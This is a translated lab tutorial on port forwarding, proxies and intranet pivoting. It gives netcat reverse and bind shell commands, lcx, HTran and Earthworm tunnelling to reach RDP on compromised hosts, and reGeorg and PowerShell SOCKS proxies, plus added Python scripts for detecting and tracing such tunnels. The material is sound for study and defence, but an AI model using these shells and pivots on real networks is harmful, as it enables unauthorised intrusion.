Port forwarding & port mapping
0x01 What is port forwarding
Port forwarding, sometimes called tunneling, is a method used by Secure Shell (SSH) for secure communication over a network. Port forwarding is the act of forwarding a network port from one network node to another, which enables an external user to reach a port on a private internal IP address (inside a local area network) from the outside through an activated NAT router.
In plain terms: port forwarding forwards a port, which can be a port on this machine or a port on any host this machine can reach, to any IP that can be reached. Usually this IP is a public network IP.
0x02 What is port mapping
Port mapping is a kind of NAT. Its function is to translate a public network address into a private address. An ADSL broadband router in routing mode has a dynamic or fixed public network IP; the ADSL line connects directly to a hub or switch, and all computers share the connection.
In plain terms: port mapping maps an internal network port to a certain port on the public network. Suppose my own computer is on the internal network and has no public network IP, but I want to provide a port for other people to use. That is port mapping.
0x03 Distinguish between port mapping and port forwarding
Port mapping scenario:
Host A on the external network wants to access the service on host B on the internal network
Port forwarding scenario:
Host A on the external network can access any port on host B on the internal network, but cannot access the port on host C on the internal network.
In this case, you can connect the port of host C to a port of host B; then external host A accessing that port of host B is equivalent to accessing the port of host C.
Summary:
The principles of port forwarding and port mapping are the same, but the application scenarios differ. If we forward a port of the local machine to a port of a remote host, we can call it either port mapping or port forwarding; see the picture below [note the text on the picture].
If we forward a port of any IP that this machine can access to a port of another server, we call it port forwarding; see the picture below [note the text on the picture].
0x04 Distinguish forward connection and reverse connection
- Forward connection: your machine connects to the target machine
- Reverse connection: the target machine connects back to your machine
- Whether mapping or forwarding, each has pros and cons, but the principle is the same
0x05 Port forwarding and proxy tools
- Lcx
- Htran
- Netcat
0x06 Environment topology map
Host A: W7
Host B: W7
Host C: XP
0x07 NC
NC usage
2. NC reverse connection - network environment assumptions:
A cannot access intranet B from the external network [A means the attacker is on the external network]
B's internal network can access external network A
A:192.168.0.226
B:192.168.32.130
This suits an nc reverse connection: it bounces the shell of internal host B out to external host A
Execute on external host A: nc -nvlp 7777
Execute on intranet host B: nc -e cmd 192.168.0.226 7777
Here I assume I am already connected to a shell and have uploaded nc
Output on host A:
3. NC forward connection - network environment assumptions:
A's internal network can access external network B [A means the attacker is on the internal network]
B's external network cannot access intranet A
This suits an nc forward connection: it also exposes the shell of internal host A to external host B
Execute on intranet host A: nc -l -p 5555 -e cmd.exe
Execute on external host B: nc -nvv 192.168.0.226 5555
4. Explanation:
If the client [equivalent to the internal network] connects to the server [equivalent to the external network] and wants to obtain the server's shell, it is called a forward shell. If the client connects to the server and the server wants to obtain the client's shell, it is called a reverse shell.
NC is the Swiss Army knife of security; it is famous because it can not only bounce shells and forward ports but also chat, and so on.
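As an added example (not from the original post), here is a small Python detector that applies the post's forward/reverse definitions to process-creation logs: a listener that hands out a shell (-l with -e) is the forward case, and a connect-out with -e is the reverse case. The log format and the sample lines are constructed for this example and mirror the nc invocations shown above.

```python
import re
import shlex

# Constructed sample process-creation log lines (not from the original post);
# the commands mirror the nc invocations shown in the forward/reverse scenarios.
SAMPLE_LOGS = [
    "host=A user=ops cmd=nc -nvlp 7777",
    "host=B user=svc cmd=nc -e cmd 192.168.0.226 7777",
    "host=A user=svc cmd=nc -l -p 5555 -e cmd.exe",
    "host=B user=ops cmd=nc -nvv 192.168.0.226 5555",
    "host=C user=ops cmd=nc -zv 192.168.32.135 80",
    "host=C user=ops cmd=notepad.exe -e cmd",
]

NC_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat"}
LOG_RE = re.compile(r"host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.+)$")

def classify_nc(cmd):
    """Classify an nc command line by the post's definitions.
    Returns 'forward_shell' (listener that hands out a shell, the post's forward
    connection), 'reverse_shell' (connects out and hands over a shell, the post's
    reverse connection), 'listener' (a plain handler such as nc -nvlp 7777),
    'client' (plain outbound connection), or None if the command is not nc."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return None
    if not argv or argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower() not in NC_NAMES:
        return None
    # Collapse single-dash flag clusters ("-nvlp", "-l", "-e") into one string of letters.
    flags = "".join(a[1:] for a in argv[1:] if a.startswith("-") and not a.startswith("--"))
    listens = "l" in flags
    hands_out_shell = "e" in flags or "c" in flags   # -e program / -c command (ncat)
    if listens and hands_out_shell:
        return "forward_shell"
    if hands_out_shell:
        return "reverse_shell"
    if listens:
        return "listener"
    return "client"

def scan_logs(lines):
    """Return (host, role, cmd) for every logged nc command that exposes a shell."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        role = classify_nc(m["cmd"])
        if role in ("forward_shell", "reverse_shell"):
            hits.append((m["host"], role, m["cmd"]))
    return hits

if __name__ == "__main__":
    for host, role, cmd in scan_logs(SAMPLE_LOGS):
        print(f"{host}: {role}: {cmd}")
```

A plain `nc -nvlp` handler is reported as a listener rather than a shell, so the two shell roles are the lines worth alerting on.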
0x08 LCX
LCX usage:
LCX port mapping environment assumptions:
A cannot access intranet B from the external network [A means the attacker is on the external network]
B's internal network can access external network A
Execute on intranet host B: lcx.exe -slave 192.168.0.226 7777 192.168.32.132 3389
Means: forward port 3389 of the internal network host (192.168.32.132) to port 7777 of the public network host (192.168.0.226)
Execute on external host A: lcx.exe -listen 7777 5555
Means: listen on port 7777 of this host and transfer the traffic to port 5555
At this point, opening a remote desktop connection on host A to 127.0.0.1:5555 is equivalent to accessing B's 3389
LCX port forwarding environment assumptions:
A can access B from the external network
B intranet can access C
A cannot access C
A host ip: 192.168.0.226
B host ip: 192.168.32.130
C host ip: 192.168.32.135
Execute on intranet host B: lcx.exe -tran 7777 192.168.32.135 3389
Means: transfer port 3389 of host C to port 7777 of host B
At this time, accessing port 7777 on host B is equivalent to accessing port 3389 on host C
Run mstsc on host A to connect to 192.168.32.130:7777 or 127.0.0.1:7777 on host B to access 3389 of C
Explanation:
LCX is mostly used when the compromised host (the "broiler", i.e. bot) is on the intranet and the attacker wants to manage it through a remote terminal. Generally, the attacker enables 3389 on the bot and then forwards the port through LCX.
0x09 HTRAN
HTRAN usage
How to use HTRAN - environment assumption 1
B is on the public network
A can directly access B [B has enabled 3389, but B's firewall blocks connections to 3389]
B can also access A
A host ip: 192.168.0.226
B host ip: 192.168.32.130
C host ip: 192.168.32.135
Method 1:
Execute on host B: HTran2.4.exe -p -tran 7777 127.0.0.1 3389
Means: forward B's port 3389 to port 7777 of the same machine
At this point, host A connects with the remote desktop client to 192.168.32.130:7777
Method 2:
Listen on host A: HTran2.4.exe -p -listen 8888 9999
Means: listen on port 8888 of this machine and transfer the traffic from port 8888 to port 9999
Execute on host B: HTran2.4.exe -p -slave 192.168.0.226 8888 127.0.0.1 3389
Means: forward port 3389 of this machine to port 8888 of A
Next, connect the remote desktop client on host A to local port 9999, and you reach B's 3389
How to use HTRAN - environment assumption 2
Host B is on the public network
C is on B's intranet
A can access B, but not C
A host ip: 192.168.0.226
B host ip: 192.168.32.130
C host ip: 192.168.32.135
Method 1:
Execute on host B: HTran2.4.exe -p -tran 8888 192.168.32.135 3389
Means: forward port 3389 of host C to port 8888 of host B
At this point, A connecting to B's 8888 is equivalent to accessing C's 3389
Method 2:
Listen on host B: HTran2.4.exe -p -listen 7777 9999
Means: listen on port 7777 of host B and forward the traffic to port 9999
Execute on host C: HTran2.4.exe -p -slave 192.168.32.130 7777 127.0.0.1 3389
Means: transfer port 3389 of C to port 7777 of host B
Proxy
0x01 What is a proxy
Proxy (English: Proxy), also known as network proxy, is a special network service that allows a network terminal (usually a client) to make an indirect connection with another network terminal (usually a server) through this service. Some network devices such as gateways and routers have network proxy functions. It is generally believed that proxy services are conducive to ensuring the privacy or security of network terminals and preventing attacks.
0x02 Proxy categories
HTTP proxy
SOCKS proxy
FTP proxy
Telnet proxy
SSL proxy
0x03 Distinguish between forward proxy and reverse proxy
In a forward proxy, the proxy and the client belong to the same LAN and the proxy is transparent to the server; in a reverse proxy, the proxy and the server belong to the same LAN and the proxy is transparent to the client. One proxy stands in for the client and the other for the server.
Note: I drew it myself; I don't accept criticism ☺
0x04 reGeorg+Proxychains proxy
reGeorg is the successor of reDuh. It mainly forwards ports of the intranet server to the local machine through an http/https tunnel
Select the corresponding server-side script and upload it to host B's server; in my case it is the PHP one
Accessing the file shows "Georg says, 'All seems fine'", so the proxy is working
Then run reGeorgSocksProxy.py [requires the urllib3 module]: python2 reGeorgSocksProxy.py -u "http://192.168.32.130/tunnel.php" -p 8888
The command line interface also displays "All seems fine"
Next use the tool Proxifier
First add a server
Configure proxy rules
Here choose the remote desktop program mstsc
Connect to remote desktop
You can see the traffic going through the proxy
0x05 Socks4/5 proxy based on powershell
Invoke-SocksProxy is used, address: GitHub - p3nt4/Invoke-SocksProxy: Socks proxy, and reverse socks server using powershell.
Invoke-SocksProxy Usage
Invoke-SocksProxy usage method one
Win10 host ip: 192.168.192.130
Win7 host ip: 192.168.192.129
Create a socks4/5 proxy
On Win10, first run PowerShell with administrator privileges. If you are told that script execution is disabled, enter "Set-ExecutionPolicy RemoteSigned"
Enter Import-Module .\Invoke-SocksProxy.psm1 to import the module
Enter Invoke-SocksProxy -bindPort 1234 to create a socks proxy on port 1234
Next, use socks proxy software on Win7 to access the external network through port 1234 of Win10
The software I used this time is sockscap; of course Proxychains will also work
Click File and select "Settings" to set the socks server IP and port, click Apply, then OK
Click New, select the program that needs to go through the proxy; I choose the Firefox browser here
Click Run, and we visit Baidu
On the Win10 host, the window shows that the connection succeeded
Invoke-SocksProxy usage method two
Threaded mode: enter Invoke-SocksProxy -bindPort 1234 -threads 400
If you don't add -bindPort, the default port is 1080
0x06 Earthworm
EW is a set of portable network penetration tools with two core functions, setting up a SOCKS v5 service and port forwarding, which can complete network penetration in complex network environments
Note: This tool is no longer updated or available for download
Earthworm Usage
The following figure is a schematic diagram:
This tool can open a network tunnel by means of "forward", "reverse" and "multi-level cascading" to reach deep into the network, breaking through network restrictions with the earthworm's unique means and loosening the soil for firewalls.
The toolkit provides a variety of executable files for different operating systems, including Linux, Windows, MacOS and Arm-Linux. Support for more platforms is still being maintained, so stay tuned.
Instructions:
In all the following examples, unless otherwise specified, the proxy port is 1080, and the service is SOCKSv5 proxy service.
The tool has 6 command formats (ssocksd, rcsocks, rssocks, lcx_slave, lcx_listen, lcx_tran).
- Forward SOCKS v5 server
$ ./ew -s ssocksd -l 1080
- Bounce SOCKS v5 server
This operation is divided into two steps:
a) First run the following command on a host A with a public network ip:
$ ./ew -s rcsocks -l 1080 -e 8888
b) Start the SOCKS v5 service on the target host B and bounce it to port 8888 of the public network host:
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
Success.
- Multi-level cascade
The tool comes with three port forwarding instructions, and their parameter formats are:
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
Through these port forwarding instructions, TCP-based services deep in the network, such as SOCKS v5, can be forwarded to the root.
First, two "two-level cascading" local SOCKS test samples:
a) Usage of lcx_tran
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
b) Usage of lcx_listen and lcx_slave
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
A "three-level cascading" local SOCKS test case for reference:
$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777
Data flow direction: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks
Note: The source of the above content refers to the official website or the Readme in the tool
Earthworm usage method one [forward proxy]
Win7 host ip: 192.168.192.1
Win7 host ip: 192.168.192.9
There is a public network IP at the border of the target network, and the listening port can be opened freely:
+---------+      +-----------------------+
|HackTools| ->>  | 7777 -> 192.168.192.9 |
+---------+      +-----------------------+
Execute: ew_for_win_32.exe -s ssocksd -l 7777
Means: on the Win7 host 192.168.192.9, this command opens a socks proxy on port 7777
Next, you can use tools such as sockscap or Proxychains to access the proxy port; since I described their usage above, I won't repeat it and will just put the demo screenshot here
Note: This is a forward proxy; the proxy side is the hacker's client, and the connected side, the broiler (bot), is equivalent to the server
Earthworm usage method two [reverse proxy]
Win7 x32 host ip: 192.168.0.75 [hack machine]
Win7 host ip: 192.168.0.226 [public network machine]
Win7 host ip: 192.168.192.9 [intranet machine]
There is no public IP at the target network boundary, so a socks proxy needs to be created by bouncing back:
192.168.192.9    Controllable public network IP host                Controllable internal network host
+---------+      +-------------------------------+      |          +-------------------+
|HackTools| ->>  | 1089 -> 192.168.0.226 -> 9999 |      | Firewall | <-- 192.168.0.75  |
+---------+      +-------------------------------+      |          +-------------------+
Execute on the public network machine [vps]: ew_for_win_32.exe -s rcsocks -l 1089 -e 9999
Means: add a transfer tunnel on the public network host 192.168.0.226, forwarding the proxy requests received on 1089 to the host connected to port 9999
Execute on the intranet host [controllable broiler]: ew_for_win_32.exe -s rssocks -d 192.168.0.226 -e 9999
Means: connect the controllable intranet host of the target network back to the public network host
Next, you can use the socks5 proxy service provided by the rssocks host by pointing tools such as sockscap or Proxychains at 192.168.0.226:1089
Earthworm usage method three
Win7 host ip: 192.168.192.1 [hack machine]
Win7 host ip: 192.168.192.9 [A]
Win7 host ip: 192.168.192.11 [B]
Obtain control of two hosts A and B in the target network; the situation is as follows:
Host A: has a public network IP and can listen on any port freely, but cannot access the specific resource
Host B: the internal host of the target network, which can access the specific resource but cannot access the public network
Host A can connect directly to host B
                 Controllable boundary host A           can access the specified resource host B
+---------+      +----------------------------+      +------------------------+
|HackTools| ->>  | 1099 --> 192.168.192.9 --> | ->>  | 7777 -> 192.168.192.11 |
+---------+      +----------------------------+      +------------------------+
Execute on host B: ew_for_win_32.exe -s ssocksd -l 7777
Means: use ssocksd to start the socks proxy on port 7777 on host B
Execute on host A: ew_for_win_32.exe -s lcx_tran -l 1099 -f 192.168.192.11 -g 7777
Means: forward the socks proxy requests received on port 1080 (1099 in the command above) to port 7777 of host B.
Next, you can use the socks5 proxy service provided by the rssocks host by pointing sockscap, Proxychains or other tools at 192.168.192.9:1099
Proxy success screenshot:
Earthworm usage method 4
Win7 host ip: 192.168.192.1 [hack machine]
Win7 host ip: 192.168.192.9 [A]
Win7 host ip: 192.168.192.10 [public network machine]
Win7 host ip: 192.168.192.13 [B]
Obtain control of two hosts A and B in the target network; the situation is as follows:
Host A: the border host of the target network, which has no public IP and cannot access the specific resource.
Host B: the internal host of the target network, which can access the specific resource but cannot connect back to the public network.
Host A can connect directly to host B
- Execute on the public network machine: ew_for_win_32.exe -s lcx_listen -l 1099 -e 8888
Means: add a transfer tunnel on the public network IP host 192.168.192.10, forwarding the proxy requests received on 1080 (1099 in the command above) to the host connected to port 8888
- Execute on host B: ew_for_win_32.exe -s ssocksd -l 9999
Means: start the socks proxy on port 9999 using ssocksd on the 192.168.192.13 [B] host
- Execute on host A: ew_for_win_32.exe -s lcx_slave -d 192.168.192.10 -e 8888 -f 192.168.192.13 -g 9999
Means: on 192.168.192.9, open a communication tunnel between 192.168.192.10:8888 and 192.168.192.13:9999 through the tool's lcx_slave mode
HackTools can use the socks5 proxy provided by host 192.168.192.13 by accessing 192.168.192.10:1099
Successful screenshots (B, the public network machine, A, and the hack machine):
Note: Red is normal; my proxy machine B cannot access the external network
Earthworm Summary
Currently the tool provides six link states, selected through the -s parameter:
ssocksd rcsocks rssocks
lcx_slave lcx_tran lcx_listen
Among them, the core SOCKS5 service logic is provided by ssocksd and rssocks, corresponding to the forward and reverse socks proxy respectively.
The remaining lcx link states are used to open a path between the test host and the socks server.
lcx-type pipelines:
lcx_slave: one side of the pipeline connects to the proxy requester in bounce mode, and the other side connects to the proxy-providing host.
lcx_tran: this pipeline receives proxy requests by listening on a local port and relays them to the proxy host.
lcx_listen: this pipeline receives data by listening on a local port and relays it to the proxy-providing host that has connected back from the target network.
By combining the characteristics of the lcx-type pipelines, penetration testing in a multi-layer intranet environment can be realized.
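The lcx/HTran -slave/-listen/-tran modes above and Earthworm's lcx_slave/lcx_listen/lcx_tran follow the same listen/dial pattern, and a cascade of them is easy to miswire. As an added example (not part of the Earthworm tool or the original post), this Python script parses ew command lines like the ones above and walks the chain from the entry SOCKS port to the node that serves SOCKS, reproducing the readme's "data flow direction" line; the same walk lets an incident responder reconstruct a tunnel's topology from command lines recovered on the hosts. The sample commands are the readme's three-level cascade.

```python
import shlex

# Constructed sample: the three-level cascade from the Earthworm readme section above.
CASCADE = [
    "./ew -s rcsocks -l 1080 -e 8888",
    "./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999",
    "./ew -s lcx_listen -l 9999 -e 7777",
    "./ew -s rssocks -d 127.0.0.1 -e 7777",
]

def parse_ew(cmd):
    """Turn one ew command line into a dict of its -s/-l/-e/-d/-f/-g options."""
    argv = shlex.split(cmd)
    opts, i = {}, 1                         # argv[0] is ./ew or ew_for_win_32.exe
    while i + 1 < len(argv):
        if argv[i].startswith("-"):
            opts[argv[i].lstrip("-")] = argv[i + 1]
            i += 2
        else:
            i += 1
    for k in ("l", "e", "g"):               # ports become ints; -d/-f stay host strings
        if k in opts:
            opts[k] = int(opts[k])
    return opts

def trace_flow(cmds, entry_port):
    """Follow the data flow from the entry SOCKS port to the node serving SOCKS.
    Listeners are indexed by -l; lcx_slave/rssocks dial out to -d:-e, so they are
    indexed by the -e port they dial. Raises ValueError on a broken or looping chain."""
    hops = [parse_ew(c) for c in cmds]
    by_listen = {h["l"]: h for h in hops if "l" in h}
    by_dial = {h["e"]: h for h in hops if "d" in h}
    path, port, seen = ["SOCKS v5"], entry_port, set()
    while True:
        if port in seen:
            raise ValueError(f"forwarding loop at port {port}")
        seen.add(port)
        path.append(str(port))
        hop = by_listen.get(port)
        if hop is None:
            raise ValueError(f"nothing listens on port {port}")
        mode = hop["s"]
        if mode == "ssocksd":                  # forward SOCKS server: end of the chain
            return path + ["ssocksd"]
        if mode == "lcx_tran":                 # plain relay: listen on -l, connect to -f:-g
            port = hop["g"]
            continue
        if mode in ("rcsocks", "lcx_listen"):  # bounce acceptor: a peer must dial -e back
            peer = by_dial.get(hop["e"])
            path.append(str(hop["e"]))
            if peer is None:
                raise ValueError(f"no peer dials back to port {hop['e']}")
            if peer["s"] == "rssocks":         # reverse SOCKS server: end of the chain
                return path + ["rssocks"]
            port = peer["g"]                   # lcx_slave carries traffic on to -f:-g
            continue
        raise ValueError(f"unexpected mode {mode} on port {port}")

if __name__ == "__main__":
    print(" -> ".join(trace_flow(CASCADE, 1080)))
```

Ports alone identify the hops, so the multi-host cases above (for example method 4's lcx_listen on the public host, lcx_slave on A and ssocksd on B) trace the same way.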
Note: This is a summary I wrote earlier. I edited the content and shared the pictures. Many tools such as frp and ngrok are not summarized in it. If you have any questions, I hope you will give me your advice, and please don't flame me.